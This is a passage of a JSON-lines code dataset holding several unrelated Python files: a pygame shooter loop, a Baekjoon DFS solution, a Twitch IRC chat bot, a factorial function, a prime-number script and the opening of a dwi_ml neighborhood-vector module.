ships\r\n for ships in computerShips[:]:\r\n if ships['dir'] == RIGHT:\r\n ships['rect'].right += ships['speed']\r\n if ships['dir'] == LEFT:\r\n ships['rect'].left -= ships['speed']\r\n\r\n # have the computer ships fire bullets\r\n for ships in computerShips[:]:\r\n if ships['reload'] <= 0:\r\n computerShipsCannonX = ships['rect'].left\r\n computerShipsCannonY = ships['rect'].bottom\r\n newComputerBullet = {'rect':pygame.Rect(computerShipsCannonX, (computerShipsCannonY - 2), computerBulletWidth, computerBulletHeight),\r\n 'speed':computerBulletSpeed,\r\n 'surface':pygame.transform.scale(enemyBulletImage, (((computerBulletWidth*2)+1),(computerBulletHeight*2)))}\r\n computerBullets.append(newComputerBullet)\r\n ships['reload'] = (computerReload + random.randint(-10, 20))\r\n\r\n # check if the computer ships are trying to move off screen\r\n for ships in computerShips[:]:\r\n if ships['rect'].right >= WINDOWWIDTH:\r\n ships['rect'].top += (computerShipHeight + 2)\r\n ships['dir'] = LEFT\r\n if ships['rect'].left <= 0:\r\n ships['rect'].top += (computerShipHeight + 2)\r\n ships['dir'] = RIGHT\r\n \r\n # check if the players shields have been hit by computer bullets\r\n for bullets in computerBullets[:]:\r\n if playerShield.colliderect(bullets['rect']):\r\n if playerShieldHealth > 0:\r\n if wave > 10 and playerShieldHealth > 1:\r\n playerShieldHealth -= 1\r\n if wave > 20 and playerShieldHealth > 2:\r\n playerShieldHealth -= 1\r\n computerBullets.remove(bullets)\r\n playerShieldHealth -= 1\r\n\r\n # check if the players ship has been hit when the shields are down\r\n for bullets in computerBullets[:]:\r\n if playerShieldHealth <= 0:\r\n if playerShip['rect'].colliderect(bullets['rect']):\r\n computerBullets.remove(bullets)\r\n playerAlive = False\r\n gameLoop = 0\r\n \r\n # check if computer or player bullets are off the screen\r\n for bullets in computerBullets[:]:\r\n if bullets['rect'].bottom > (WINDOWHEIGHT + computerBulletHeight):\r\n computerBullets.remove(bullets)\r\n\r\n for bullets in playerBullets[:]:\r\n if bullets.top < -(playerBulletHeight):\r\n playerBullets.remove(bullets)\r\n \r\n # draw the black background onto the surface\r\n windowSurface.fill(BLACK)\r\n windowSurface.blit(backgroundRect, (0,0))\r\n \r\n\r\n # draw the player ship and shield onto the surface\r\n #pygame.draw.rect(windowSurface, WHITE, playerShip['rect'])\r\n windowSurface.blit(playerShip['surface'], ((playerShip['rect'].left - (playerWidth / 2)), (playerShip['rect'].top - (playerHeight / 2))))\r\n if playerShieldHealth > 0:\r\n windowSurface.blit(shieldRect, ((playerShield.left - shieldSpaceTop +1), (playerShield.top - shieldSpaceTop)))\r\n #pygame.draw.circle(windowSurface, LIGHTBLUE, playerShip['rect'].center, int(shieldRadius), playerShieldHealth)\r\n \r\n # draw the players bullets onto the surface\r\n for bullets in playerBullets[:]:\r\n #pygame.draw.rect(windowSurface, GREEN, bullets)\r\n playerBulletRect = pygame.transform.scale(playerBulletImage, ((playerBulletHeight*2), (playerBulletHeight*2)))\r\n windowSurface.blit(playerBulletRect, (bullets.left, bullets.top))\r\n\r\n # draw the players laser onto the surface\r\n if playerLaserOn:\r\n playerLaser = pygame.Rect(playerShip['rect'].centerx,(playerShip['rect'].top - 5),playerLaserWidth,-10)\r\n playerLaserExtension = pygame.Rect(playerShip['rect'].centerx,(playerLaser.top-extensionValue),playerLaserWidth,-10)\r\n pygame.draw.rect(windowSurface, DEEPPURPLE, playerLaser)\r\n while playerLaserExtension.top > 0:\r\n playerLaserExtension = pygame.Rect(playerShip['rect'].centerx,(playerLaser.top-extensionValue),playerLaserWidth,-10)\r\n playerLaserList.append(playerLaserExtension)\r\n extensionValue += 10\r\n \r\n for lasers in playerLaserList[:]:\r\n pygame.draw.rect(windowSurface, PURPLE, lasers)\r\n\r\n if not playerLaserOn:\r\n extensionValue = 0\r\n for lasers in playerLaserList[:]:\r\n playerLaserList.remove(lasers)\r\n \r\n # draw the computers bullets onto the surface\r\n for bullets in computerBullets[:]:\r\n #pygame.draw.rect(windowSurface, RED, bullets['rect'])\r\n windowSurface.blit(bullets['surface'], (bullets['rect'].left, bullets['rect'].top))\r\n\r\n # draw the computer ships onto the surface\r\n for ships in computerShips[:]:\r\n #pygame.draw.rect(windowSurface, GREEN, ships['rect'])\r\n windowSurface.blit(ships['surface'], ((ships['rect'].left - 4), (ships['rect'].top - 2)))\r\n\r\n # draw the dashboard onto the surface\r\n pygame.draw.rect(windowSurface, GREY, dashBoard)\r\n\r\n # draw the players shield display onto the surface\r\n shieldDisplay = pygame.Rect(5, (WINDOWHEIGHT - 20), (playerShieldHealth * 25), 10)\r\n shieldRegenDisplay = pygame.Rect(shieldDisplay.right, (WINDOWHEIGHT - 20), (playerShieldRegenRate / 8), 10)\r\n shieldRegenFiller = pygame.Rect(shieldDisplay.right, (WINDOWHEIGHT - 20), (playerShieldRegenThresh / 8), 10)\r\n pygame.draw.rect(windowSurface, LIGHTBLUE, shieldDisplay)\r\n pygame.draw.rect(windowSurface, DARKGREY, shieldRegenFiller)\r\n pygame.draw.rect(windowSurface, YELLOW, shieldRegenDisplay)\r\n drawText('Shields - Regen', smallFont, windowSurface, shieldDisplay.left, (shieldDisplay.top - 20), BLUE)\r\n\r\n # draw the players reload onto the surface\r\n reloadDisplay = pygame.Rect((WINDOWWIDTH - 40), (WINDOWHEIGHT - 20), currentReload, 10)\r\n reloadFiller = pygame.Rect((WINDOWWIDTH - 40), (WINDOWHEIGHT - 20), reload, 10)\r\n pygame.draw.rect(windowSurface, DARKGREY, reloadFiller)\r\n pygame.draw.rect(windowSurface, RED, reloadDisplay)\r\n drawText('Reload', smallFont, windowSurface, reloadDisplay.left, (reloadDisplay.top - 20), RED)\r\n\r\n # draw the players score onto the surface\r\n drawText('Score: %s' % playerScore, font, windowSurface, 1, 1, RED)\r\n\r\n # draw the wave onto the surface\r\n drawText('Wave: %s' % wave, font, windowSurface, 1, 15, YELLOW)\r\n\r\n # draw the players credits onto the surface\r\n drawText('Credits: $%s' % playerCredits, font, windowSurface, 1, 31, GREEN)\r\n \r\n # decrement the players reload time\r\n if currentReload > 0:\r\n currentReload -= 1\r\n # if the laser is firing, lower its current duration\r\n if playerLaserOn:\r\n playerLaserCurrentDuration -= 1\r\n if not playerLaserOn and playerLaserCurrentReload > 0 and playerLaserOwned:\r\n playerLaserCurrentReload -= 1\r\n \r\n # decrement all computer ships reload times\r\n for ships in computerShips[:]:\r\n if ships['reload'] > 0:\r\n ships['reload'] -= 1\r\n\r\n # reduce the time between computer spawns after a period of time\r\n if spawnRate <= 0:\r\n\r\n wave += 1\r\n \r\n if addComputerIncrement > 30:\r\n addComputerIncrement -= 7 # increase the rate at which computer ships are spawned\r\n if computerReload > 20: # increase the rate at which computer ships fire\r\n computerReload -= 1\r\n if bulletInflator <= 0: # increase the size of computer bullets\r\n if computerBulletWidth < 8:\r\n computerBulletWidth += 1\r\n computerBulletHeight += 1\r\n bulletInflator = 2\r\n\r\n if computerBulletWidth < 8:\r\n bulletInflator -= 1\r\n \r\n spawnRate = 2000 # reset the spawn rate cycle timer\r\n \r\n # decrement the computer ship, shield regen and spawn rate counters\r\n addComputerShip -= random.randint(1, 2) # add a random element to computer ship spawn, potentialy doubling the rate\r\n spawnRate -= 1\r\n if playerShieldHealth < playerShieldMax:\r\n if playerShieldRegenRate <= playerShieldRegenThresh:\r\n playerShieldRegenRate += 1\r\n \r\n # draw the window onto the screen\r\n pygame.display.update()\r\n mainClock.tick(40)\r\n\r\n # handle the player's death\r\n windowSurface.fill(BLACK)\r\n drawText('You have died . . . press SPACE to continue', font, windowSurface, ((WINDOWWIDTH / 4) - 20), (WINDOWHEIGHT / 2), GREEN)\r\n drawText('Your score was: %s' % playerScore, font, windowSurface,(WINDOWWIDTH / 4), ((WINDOWHEIGHT / 2) + 20), GREEN)\r\n pygame.display.update()\r\n waitForPlayerToPressKey()\r\n \r\n","sub_path":"Python_Defender/pythonDefenderFullScreen.py","file_name":"pythonDefenderFullScreen.py","file_ext":"py","file_size_in_byte":30026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"69734129","text":"import sys\r\ndef read(): return sys.stdin.readline().strip()\r\n\r\nn = int(read())\r\nmatrix = [list(map(int, list(read()))) for _ in range(n)]\r\n\r\naboutX = [1,-1,0,0]\r\naboutY = [0,0,1,-1]\r\n\r\ndef dfs(matrix, count, x, y):\r\n matrix[x][y] = 0\r\n for i in range(4):\r\n dX = x + aboutX[i]\r\n dY = y + aboutY[i]\r\n if (dX >= 0) & (dY>=0) & (dX< n) & (dY < n):\r\n if matrix[dX][dY] == 1:\r\n count = dfs(matrix, count+1, dX, dY)\r\n return count\r\n\r\nans = []\r\nfor i in range(n):\r\n for j in range(n):\r\n if matrix[i][j]==1:\r\n ans.append(dfs(matrix, 1, i, j))\r\n\r\nprint('group number: ',len(ans))\r\nfor i in sorted(ans):\r\n print(i)\r\n","sub_path":"BAEKJOON/[baek] 2667_dfs.py","file_name":"[baek] 2667_dfs.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"139347933","text":"\"\"\"Module for Twitch bot and threaded logging.\"\"\"\n\nfrom twisted.words.protocols import irc\nfrom twisted.internet import reactor\nfrom collections import defaultdict\nfrom bot.commands import Permission\nfrom threading import Thread\nimport traceback\nimport requests\nimport logging\nimport bot.commands\nimport bot.ranking\nimport bot.emotecounter\nimport signal\nimport json\nimport time\nfrom six.moves import input\nfrom importlib import reload\n\n\nUSERLIST_API = \"http://tmi.twitch.tv/group/user/{}/chatters\"\nTWITCHEMOTES_API = \"http://api.twitch.tv/kraken/chat/emoticon_images?emotesets=0\"\nGLOBAL_BTTVEMOTES_API = \"http://api.betterttv.net/2/emotes\"\nCHANNEL_BTTVEMOTES_API = \"http://api.betterttv.net/2/channels/{}\"\nHEARTHSTONE_CARD_API = \"http://api.hearthstonejson.com/v1/latest/enUS/cards.collectible.json\"\nEMOJI_API = \"https://raw.githubusercontent.com/github/gemoji/master/db/emoji.json\"\n\nwith open('configs/bot_config.json') as fp:\n CONFIG = json.load(fp)\n\nTRUSTED_MODS_PATH = 'data/trusted_mods.json'\nPRONOUNS_PATH = 'data/pronouns.json'\nPLEB_COOLDOWN = CONFIG[\"pleb_cooldown\"]\nPLEB_GAMETIMER = CONFIG[\"pleb_gametimer\"]\n\n\nclass TwitchBot(irc.IRCClient, object):\n \"\"\"TwitchBot extends the IRCClient to interact with Twitch.tv.\"\"\"\n\n last_warning = defaultdict(int)\n owner_list = CONFIG['owner_list']\n ignore_list = CONFIG['ignore_list']\n nickname = str(CONFIG['username'])\n clientID = str(CONFIG['clientID'])\n password = str(CONFIG['oauth_key'])\n cleverbot_key = str(CONFIG['cleverbot_key'])\n channel = \"#\" + str(CONFIG['channel'])\n\n trusted_mods_path = TRUSTED_MODS_PATH\n pronouns_path = PRONOUNS_PATH\n\n host_target = False\n pause = True\n commands = []\n gameRunning = False\n antispeech = False # if a command gets executed which conflicts with native speech\n pyramidBlock = False\n pleb_cooldowntime = PLEB_COOLDOWN # time between non-sub commands\n pleb_gametimer = PLEB_GAMETIMER # time between pleb games\n last_plebcmd = time.time() - pleb_cooldowntime\n last_plebgame = time.time() - pleb_gametimer\n\n ranking = bot.ranking.Ranking()\n\n with open(TRUSTED_MODS_PATH) as fp:\n trusted_mods = json.load(fp)\n\n with open(PRONOUNS_PATH) as fp:\n pronouns = json.load(fp)\n\n def signedOn(self):\n \"\"\"Call when first signed on.\"\"\"\n self.factory.wait_time = 1\n logging.warning(\"Signed on as {}\".format(self.nickname))\n\n signal.signal(signal.SIGINT, self.manual_action)\n\n # When first starting, get user list\n url = USERLIST_API.format(self.channel[1:])\n data = requests.get(url).json()\n self.users = set(sum(data['chatters'].values(), []))\n self.mods = set()\n self.subs = set()\n\n \"\"\"On first start, get twitchtv-emotelist\"\"\"\n url = TWITCHEMOTES_API\n data = requests.get(url).json()\n emotelist = data['emoticon_sets']['0']\n\n self.twitchemotes = []\n for i in range(0, len(emotelist)):\n emote = emotelist[i]['code'].strip()\n if ('\\\\') not in emote:\n self.twitchemotes.append(emote)\n\n \"\"\"On first start, get global_BTTV-emotelist\"\"\"\n url = GLOBAL_BTTVEMOTES_API\n data = requests.get(url).json()\n emotelist = data['emotes']\n\n self.global_bttvemotes = []\n for i in range(0, len(emotelist)):\n emote = emotelist[i]['code'].strip()\n self.global_bttvemotes.append(emote)\n\n \"\"\"On first start, get channel_BTTV-emotelist\"\"\"\n url = CHANNEL_BTTVEMOTES_API.format(self.channel[1:])\n data = requests.get(url).json()\n emotelist = data['emotes']\n\n self.channel_bttvemotes = []\n for i in range(0, len(emotelist)):\n emote = emotelist[i]['code'].strip()\n self.channel_bttvemotes.append(emote)\n\n \"\"\"All available emotes in one list\"\"\"\n self.emotes = self.twitchemotes + self.global_bttvemotes + self.channel_bttvemotes\n\n \"\"\"On first start, get all hearthstone cards\"\"\"\n url = HEARTHSTONE_CARD_API\n self.cards = requests.get(url).json()\n\n \"\"\"On first start get all emojis\"\"\"\n url = EMOJI_API\n self.emojilist = requests.get(url).json()\n self.emojis = []\n for i in range(0, len(self.emojilist)):\n try:\n self.emojis.append(self.emojilist[i]['emoji'])\n except KeyError:\n pass # No Emoji found.\n\n \"\"\"Initialize emotecounter\"\"\"\n self.ecount = bot.emotecounter.EmoteCounter(self)\n self.ecount.startCPM()\n\n # Get data structures stored in factory\n self.activity = self.factory.activity\n self.tags = self.factory.tags\n\n # Load commands\n self.reload_commands()\n\n # Join channel\n self.sendLine(\"CAP REQ :twitch.tv/membership\")\n self.sendLine(\"CAP REQ :twitch.tv/commands\")\n self.sendLine(\"CAP REQ :twitch.tv/tags\")\n self.join(self.channel)\n\n def joined(self, channel):\n \"\"\"Log when channel is joined.\"\"\"\n logging.warning(\"Joined %s\" % channel)\n\n def privmsg(self, user, channel, msg):\n \"\"\"React to messages in the channel.\"\"\"\n # Extract twitch name\n name = user.split('!', 1)[0]\n\n # Catch twitch specific commands\n if name in [\"jtv\", \"twitchnotify\"]:\n self.jtv_command(msg)\n return\n\n # Log the message\n logging.info(\"{}: {}\".format(name, msg))\n\n # Ignore messages by ignored user\n if name in self.ignore_list:\n return\n\n # Ignore message sent to wrong channel\n if channel != self.channel:\n return\n\n self.ranking.incrementPoints(name, 1, self)\n\n # Check if bot is paused\n if not self.pause or name in self.owner_list or name in self.trusted_mods:\n self.process_command(name, msg)\n\n # Log user activity\n self.activity[name] = time.time()\n\n def modeChanged(self, user, channel, added, modes, args):\n \"\"\"Not sure what this does. Maybe gets called when mods get added/removed.\"\"\"\n if channel != self.channel:\n return\n\n # Keep mod list up to date\n func = 'add' if added else 'discard'\n for name in args:\n getattr(self.mods, func)(name)\n\n change = 'added' if added else 'removed'\n info_msg = \"Mod {}: {}\".format(change, ', '.join(args))\n logging.warning(info_msg)\n\n def userJoined(self, user, channel):\n \"\"\"Update user list when user joins.\"\"\"\n if channel == self.channel:\n self.users.add(user)\n\n def userLeft(self, user, channel):\n \"\"\"Update user list when user leaves.\"\"\"\n if channel == self.channel:\n self.users.discard(user)\n\n def parsemsg(self, s):\n \"\"\"Break a message from an IRC server into its prefix, command, and arguments.\"\"\"\n tags = {}\n prefix = ''\n trailing = []\n if s[0] == '@':\n tags_str, s = s[1:].split(' ', 1)\n tag_list = tags_str.split(';')\n tags = dict(t.split('=') for t in tag_list)\n if s[0] == ':':\n prefix, s = s[1:].split(' ', 1)\n if s.find(' :') != -1:\n s, trailing = s.split(' :', 1)\n args = s.split()\n args.append(trailing)\n else:\n args = s.split()\n command = args.pop(0).lower()\n return tags, prefix, command, args\n\n def pronoun(self, user):\n \"\"\"Get the proper pronouns for a user.\"\"\"\n if user in self.pronouns:\n return self.pronouns[user]\n else:\n return [\"he\", \"him\", \"his\"]\n\n def lineReceived(self, line):\n \"\"\"Parse IRC line.\"\"\"\n line = line.decode(\"utf-8\")\n # First, we check for any custom twitch commands\n tags, prefix, cmd, args = self.parsemsg(line)\n\n if cmd == \"hosttarget\":\n self.hostTarget(*args)\n elif cmd == \"clearchat\":\n self.clearChat(*args)\n elif cmd == \"notice\":\n self.notice(tags, args)\n elif cmd == \"privmsg\":\n self.userState(prefix, tags)\n\n # Remove tag information\n if line[0] == \"@\":\n line = line.split(' ', 1)[1]\n\n # Then we let IRCClient handle the rest\n super().lineReceived(line)\n\n def hostTarget(self, channel, target):\n \"\"\"Track and update hosting status.\"\"\"\n target = target.split(' ')[0]\n if target == \"-\":\n self.host_target = None\n logging.warning(\"Exited host mode\")\n else:\n self.host_target = target\n logging.warning(\"Now hosting {}\".format(target))\n\n def clearChat(self, channel, target=None):\n \"\"\"Log chat clear notices.\"\"\"\n if target:\n logging.warning(\"{} was timed out\".format(target))\n else:\n logging.warning(\"chat was cleared\")\n\n def notice(self, tags, args):\n \"\"\"Log all chat mode changes.\"\"\"\n if \"msg-id\" not in tags:\n return\n\n msg_id = tags['msg-id']\n if msg_id == \"subs_on\":\n logging.warning(\"Subonly mode ON\")\n elif msg_id == \"subs_off\":\n logging.warning(\"Subonly mode OFF\")\n elif msg_id == \"slow_on\":\n logging.warning(\"Slow mode ON\")\n elif msg_id == \"slow_off\":\n logging.warning(\"Slow mode OFF\")\n elif msg_id == \"r9k_on\":\n logging.warning(\"R9K mode ON\")\n elif msg_id == \"r9k_off\":\n logging.warning(\"R9K mode OFF\")\n\n def userState(self, prefix, tags):\n \"\"\"Track user tags.\"\"\"\n name = prefix.split(\"!\")[0]\n self.tags[name].update(tags)\n\n if 'subscriber' in tags:\n if tags['subscriber'] == '1':\n self.subs.add(name)\n elif name in self.subs:\n self.subs.discard(name)\n\n if 'user-type' in tags:\n if tags['user-type'] == 'mod':\n self.mods.add(name)\n elif name in self.mods:\n self.mods.discard(name)\n\n def write(self, msg):\n \"\"\"Send message to channel and log it.\"\"\"\n self.msg(self.channel, msg)\n logging.info(\"{}: {}\".format(self.nickname, msg))\n\n def get_permission(self, user):\n \"\"\"Return the users permission level.\"\"\"\n if user in self.owner_list:\n return Permission.Admin\n elif user in self.mods:\n return Permission.Moderator\n elif user in self.subs:\n return Permission.Subscriber\n return Permission.User\n\n def select_commands(self, perm):\n \"\"\"If a game is active and plebcommands on colldown, only iterate through game list.\n\n If no game is active only allow 'passive games' a.k.a PyramidGame\n \"\"\"\n if perm is 0:\n if (time.time() - self.last_plebcmd < self.pleb_cooldowntime):\n if self.gameRunning:\n return self.games\n else:\n return self.passivegames\n else:\n return self.commands\n else:\n return self.commands\n\n def process_command(self, user, msg):\n \"\"\"Process messages and call commands.\"\"\"\n perm_levels = ['User', 'Subscriber', 'Moderator', 'Owner']\n perm = self.get_permission(user)\n msg = msg.strip()\n self.cmdExecuted = False\n\n \"\"\"Emote Count Function\"\"\"\n self.ecount.process_msg(msg)\n\n \"\"\"Limit pleb bot spam. Only allow certain commands to be processed by plebs, if plebcmds on cooldown.\"\"\"\n cmdlist = self.select_commands(perm)\n\n # Flip through commands and execute everyone that matches.\n # Check if user has permission to execute command.\n # Also reduce warning message spam by limiting it to one per minute.\n for cmd in cmdlist:\n try:\n match = cmd.match(self, user, msg)\n if not match:\n continue\n cname = cmd.__class__.__name__\n if perm < cmd.perm:\n if time.time() - self.last_warning[cname] < 60:\n continue\n self.last_warning[cname] = time.time()\n reply = \"{}: You don't have access to that command. Minimum level is {}.\"\n self.write(reply.format(user, perm_levels[cmd.perm]))\n else:\n if (perm is 0 and cmd not in self.games): # Only reset plebtimer if no game was played\n self.last_plebcmd = time.time()\n cmd.run(self, user, msg)\n except ValueError or TypeError: # Not sure which Errors might happen here.\n logging.error(traceback.format_exc())\n \"\"\"Reset antispeech for next command\"\"\"\n self.antispeech = False\n\n def manual_action(self, *args):\n \"\"\"Allow manual command input.\"\"\"\n self.terminate()\n return\n\n # Always terminate. For now this won't be used.\n cmd = input(\"Command: \").strip()\n if cmd == \"q\": # Stop bot\n self.terminate()\n elif cmd == 'r': # Reload bot\n self.reload()\n elif cmd == 'rc': # Reload commands\n self.reload_commands()\n elif cmd == 'p': # Pause bot\n self.pause = not self.pause\n elif cmd == 'd': # try to enter debug mode\n IPythonThread(self).start()\n elif cmd.startswith(\"s\"):\n # Say something as the bot\n self.write(cmd[2:])\n\n def jtv_command(self, msg):\n \"\"\"Send a message when someone subscribes.\"\"\"\n if \"subscribed\" in msg:\n # Someone subscribed\n logging.warning(msg)\n\n reply = \"Thanks for subbing!\"\n if \" just subscribed\" in msg:\n user = msg.split(' just ')[0]\n reply = \"{}: {}\".format(user, reply)\n elif \" subscribed for\" in msg:\n user = msg.split(\" subscribed for\")[0]\n reply = \"{}: {}\".format(user, reply)\n self.write(reply)\n\n def get_active_users(self, t=60*10):\n \"\"\"Return list of users active in chat in the past t seconds (default: 10m).\"\"\"\n now = time.time()\n active_users = []\n for user, last in self.activity.items():\n if now - last < t:\n active_users.append(user)\n\n return active_users\n\n def close_commands(self):\n \"\"\"Gracefully end commands.\"\"\"\n for cmd in self.commands:\n try:\n cmd.close(self)\n except TypeError or ValueError: # Not sure which Errors might happen here.\n logging.error(traceback.format_exc())\n\n def reload_commands(self):\n \"\"\"Reload commands.\"\"\"\n logging.warning(\"Reloading commands\")\n\n # Reload commands\n self.close_commands()\n\n cmds = reload(bot.commands)\n\n \"\"\"Number of games.\n Games have to be on the top of the list!!!\n Passive Games have to be on the very top!!! -> Maybe we need Game-classes\n \"\"\"\n ngames = 5 # first ngames are 'games'\n self.games = []\n npassivegames = 1 # first npassivegames are 'always active games' (e.g. PyramidGame)\n self.passivegames = []\n\n self.commands = [\n cmds.Pyramid(self),\n cmds.KappaGame(self),\n cmds.GuessEmoteGame(self),\n cmds.GuessMinionGame(self),\n cmds.MonkalotParty(self),\n cmds.Sleep(self),\n cmds.EditCommandList(self),\n cmds.editQuoteList(self),\n cmds.outputQuote(self),\n cmds.outputStats(self),\n cmds.Calculator(self),\n cmds.AutoGames(self),\n cmds.PyramidReply(self),\n cmds.EmoteReply(self),\n cmds.Smorc(self),\n cmds.Rank(self),\n cmds.EditCommandMods(self),\n cmds.Pronouns(self),\n cmds.Questions(self),\n cmds.Oralpleasure(self),\n cmds.Speech(self),\n cmds.SimpleReply(self),\n cmds.PyramidBlock(self),\n cmds.Spam(self),\n cmds.TopSpammers(self)\n ]\n\n for i in range(0, ngames):\n self.games.append(self.commands[i])\n\n for i in range(0, npassivegames):\n self.passivegames.append(self.commands[i])\n\n def reload(self):\n \"\"\"Reload bot.\"\"\"\n logging.warning(\"Reloading bot!\")\n self.close_commands()\n self.quit()\n\n def terminate(self):\n \"\"\"Terminate bot.\"\"\"\n self.close_commands()\n reactor.stop()\n\n def displayName(self, user):\n \"\"\"Get the proper capitalization of a twitch user.\"\"\"\n url = \"https://api.twitch.tv/kraken/users?login=\" + user\n headers = {'Accept': 'application/vnd.twitchtv.v5+json', 'Client-ID': self.password}\n\n try:\n return requests.get(url, headers=headers).json()[\"users\"][0][\"display_name\"]\n except IndexError or KeyError:\n return user\n\n def getuserTag(self, username):\n \"\"\"Get the twitch-userTag from username.\"\"\"\n url = \"https://api.twitch.tv/kraken/users?login=\" + username\n headers = {'Accept': 'application/vnd.twitchtv.v5+json', 'Client-ID': self.clientID, 'Authorization': self.password}\n\n try:\n return requests.get(url, headers=headers).json()\n except IndexError or KeyError:\n pass\n\n def getuserID(self, username):\n \"\"\"Get the twitch-userTag from username.\"\"\"\n return self.getuserTag(username)[\"users\"][0][\"_id\"]\n\n def getuserEmotes(self, userID):\n \"\"\"Get the emotes a user can use from userID without the global emoticons.\"\"\"\n url = \"https://api.twitch.tv/kraken/users/{}/emotes\".format(userID)\n headers = {'Accept': 'application/vnd.twitchtv.v5+json', 'Client-ID': self.clientID, 'Authorization': self.password}\n\n try:\n emotelist = requests.get(url, headers=headers).json()['emoticon_sets']\n except IndexError or KeyError:\n print(\"Error in getting emotes from userID\")\n\n emotelist.pop('0', None)\n return emotelist\n\n def accessToEmote(self, username, emote):\n \"\"\"Check if user has access to a certain emote.\"\"\"\n userID = self.getuserID(username)\n emotelist = self.getuserEmotes(userID)\n for sets in emotelist:\n for key in range(0, len(emotelist[sets])):\n if emote == emotelist[sets][key]['code']:\n return True\n return False\n\n def getChannel(self, channelID):\n \"\"\"Get the subscriberemotes from channelID.\"\"\"\n url = \"https://api.twitch.tv/kraken/channels/\" + channelID\n headers = {'Accept': 'application/vnd.twitchtv.v5+json', 'Client-ID': self.clientID, 'Authorization': self.password}\n\n try:\n return requests.get(url, headers=headers).json()\n except IndexError or KeyError:\n print(\"Channel object could not be fetched.\")\n\n def setlast_plebgame(self, last_plebgame):\n \"\"\"Set timer of last_plebgame.\"\"\"\n self.last_plebgame = last_plebgame\n\n\nclass IPythonThread(Thread):\n \"\"\"An IPython thread. Used for debug mode.\"\"\"\n\n def __init__(self, b):\n \"\"\"Initialize thread.\"\"\"\n Thread.__init__(self)\n self.bot = b\n\n def run(self):\n \"\"\"Enter debug mode.\"\"\"\n logger = logging.getLogger()\n handler = logger.handlers[0]\n handler.setLevel(logging.ERROR)\n try:\n from IPython import embed\n bot = self.bot\n embed()\n del bot\n except ImportError:\n logging.error(\"IPython not installed, cannot debug.\")\n handler.setLevel(logging.INFO)\n","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":19811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"58931941","text":"# librerias\n\n# import ingreso_datos as igr # llamo a mi script y coloco un alias\n\n# cosntantes\n\n# funciones y o clases\n\ndef factorial(num):\n fact = 1\n for i in range(1, num + 1):\n fact = fact * i\n return fact\n\n\n\n# mi programa\nif __name__ == '__main__':\n # demo\n print(factorial(5))\n\n\n","sub_path":"Modulo3/scripts/programa/mate/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"610422405","text":"try:\r\n l=list(map(int,input().split()))\r\n n1=l[0]\r\n n2=l[1]\r\n l2=[]\r\n s=set()\r\n l4=[]\r\n prime=[True for i in range(n2+1)]\r\n for p in range(2,n2+1):\r\n if prime[p-1]==True:\r\n for j in range(p*p,n2+1,p):\r\n prime[j-1]=False\r\n for i in range(n1,n2+1):\r\n if prime[i-1]:\r\n l2.append(i)\r\n \r\n for i in range(len(l2)):\r\n for j in range(len(l2)):\r\n if l2[i]==l2[j]:\r\n continue\r\n else:\r\n l22=int(str(l2[i]) + str(l2[j]))\r\n s.add(l22)\r\n \r\n l23=int(str(l2[j]) + str(l2[i]))\r\n s.add(l23)\r\n l3=list(s)\r\n print(l3)\r\n prime=[True for i in range(max(l3)+1)]\r\n for p in range(2,max(l3)+1):\r\n if prime[p-1]==True:\r\n for j in range(p*p,max(l3)+1,p):\r\n prime[j-1]=False\r\n for i in l3:\r\n if prime[i-1]:\r\n l4.append(i)\r\n \r\n \r\nexcept:\r\n pass\r\n","sub_path":"python_programs/abbb2.py","file_name":"abbb2.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"439805658","text":"# -*- coding: utf-8 -*-\nimport itertools\nimport logging\nfrom typing import Iterable, Union\n\nimport numpy as np\nimport torch\n\n\ndef prepare_neighborhood_vectors(neighborhood_type: str, neighborhood_radius):\n \"\"\"\n Prepare neighborhood vectors.\n\n Params\n ------\n neighborhood_type: str\n Either the 'axes' option or the 'grid' option. See each method for a\n description.\n neighborhood_radius: Union[int, float, Iterable[float], None]\n The radius. A int for the grid option. An float or list of floats for\n the axes option. With the grid option, radius must be given in voxel\n space.\n\n Returns\n -------\n neighborhood_vectors: tensor of shape (N, 3).\n Results are vectors pointing to a neighborhood point, starting from the\n origin (i.e. current position). The current point (0,0,0) is NOT\n included.\n Hint: You can now interpolate your DWI data in each direction around\n your point of interest to get your neighbourhood.\n Returns None if neighborhood_radius is None.\n \"\"\"\n if neighborhood_type is not None:\n if neighborhood_radius is None:\n raise ValueError(\"You must provide neighborhood radius to add \"\n \"a neighborhood.\")\n\n if neighborhood_type not in ['axes', 'grid']:\n raise ValueError(\n \"Neighborhood type must be either 'axes', 'grid' \"\n \"but we received {}!\".format(neighborhood_type))\n\n if neighborhood_type == 'axes':\n neighborhood_vectors = get_neighborhood_vectors_axes(\n neighborhood_radius)\n else:\n if isinstance(neighborhood_radius, list):\n assert len(neighborhood_radius) == 1\n neighborhood_radius = neighborhood_radius[0]\n neighborhood_vectors = get_neighborhood_vectors_grid(\n neighborhood_radius)\n\n return neighborhood_vectors\n else:\n if neighborhood_radius is not None:\n logging.debug(\n \"You have chosen not to add a neighborhood (value \"\n \"None), but you have given a neighborhood radius. \"\n \"Discarded.\")\n return None\n\n\ndef get_neighborhood_vectors_axes(radius: Union[float, Iterable[float]]):\n \"\"\"\n This neighborhood definition lies on a sphere. Returns a list of 6\n positions (up, down, left, right, behind, in front) at exactly `radius`\n (mm or voxels) from origin (i.e. current postion). If radius is an iterable\n of floats, returns a multi-radius neighborhood (lying on concentring\n spheres).\n\n Hint: Neighborhood's space will depend on the radius you give. To convert,\n from mm to voxel world, you may use\n dwi_ml.data.processing.space.world_to_vox.convert_world_to_vox(\n radius_mm, affine_mm_to_vox)\n\n Note: We only support isometric voxels! Adding isometry would also require\n the voxel resolution.\n\n Parameters\n ----------\n radius : number (int or float) or iterable of numbers.\n Distance to each neighbor.\n\n Returns\n -------\n neighborhood_vectors : tensor of shape (N, 3)\n A list of vectors with last dimension = 3 (x,y,z coordinate for each\n neighbour per respect to the origin). The current point (0,0,0) is NOT\n included.\n \"\"\"\n tmp_axes = 